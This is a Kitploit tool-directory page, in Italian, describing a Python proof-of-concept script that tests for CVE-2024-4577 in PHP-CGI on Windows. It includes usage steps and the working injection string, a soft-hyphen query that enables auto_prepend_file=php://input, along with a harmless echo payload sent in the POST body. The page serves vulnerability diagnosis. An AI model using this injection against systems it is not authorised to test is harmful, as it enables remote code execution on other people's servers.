Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2024-4577 | Kitploit
Strumenti/GitHubGitHub/kimjuhyeong95/cve-2024-4577
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubkimjuhyeong95/cve-2024-4577

cve-2024-4577

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Script di test per la vulnerabilità CVE-2024-4577

Questo script Python è un semplice strumento PoC (Proof of Concept) per diagnosticare la vulnerabilità PHP CVE-2024-4577.

⚠️ Questo strumento è fornito a scopo di diagnostica di sicurezza e deve essere utilizzato solo su sistemi di propria proprietà o su target con autorizzazione preventiva.


📌 Panoramica

Questa vulnerabilità riguarda PHP quando viene eseguito in modalità CGI su Windows: tramite il bypass dei caratteri multibyte è possibile iniettare impostazioni PHP arbitrarie e indurre l'esecuzione di codice.

Questo script invia all'URL target una richiesta POST con un payload di bypass basato sulla query string e codice PHP, per determinare se è vulnerabile.


✅ Istruzioni per l'uso

1. Verifica dell'installazione di Python

root@kitploit:~
python3 --version

2. Installazione dei pacchetti dipendenti

root@kitploit:~
pip install requests

3. Esecuzione dello script

root@kitploit:~
python3 cve_2024_4577_test.py

4. Inserimento dell'URL target

Esempio di input:

root@kitploit:~
http://192.168.0.10/index.php

In alternativa, se inserisci solo il percorso root, viene gestito automaticamente

root@kitploit:~
http://192.168.0.10

🔍 Descrizione dei risultati

  • ✅ [✅] 취약: 서버가 PHP 코드를 실행했습니다.
    → Il server è vulnerabile.

  • ✔️ [✔️] 비취약 또는 차단됨
    → È stata ricevuta una risposta, ma la vulnerabilità non si è verificata.

  • ❌ [❌] 요청 실패: ...
    → Test fallito a causa di errori di connessione, timeout, ecc.


💡 Principio di funzionamento

  • Inserimento della stringa di bypass della vulnerabilità:

    root@kitploit:~
    ?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input
    
  • Inserimento del codice PHP nel corpo della POST:

    root@kitploit:~
    <?php echo 'CVE-2024-4577-TEST'; ?>
    
  • Se il server esegue questo codice, la risposta conterrà la stringa corrispondente, consentendo la diagnosi.


⚠️ Disclaimer

Questo script è fornito solo a scopo educativo e di ricerca sulla sicurezza. Scansionare o testare sistemi non autorizzati è illegale. L'utente si assume ogni responsabilità.


📂 Struttura dei file

Nome fileDescrizione
cve_2024_4577_test.pyScript Python per il test della vulnerabilità
README.mdDocumento di istruzioni e descrizione (questo file)
LICENSE.txt

📫 Contatti

Segnala bug o suggerimenti via email o PR.

📝 Licenza

Questo progetto è concesso in licenza MIT - consulta il file LICENSE per i dettagli. Copyright (c) 2025 KimJuhyeong95

Scarica lo strumento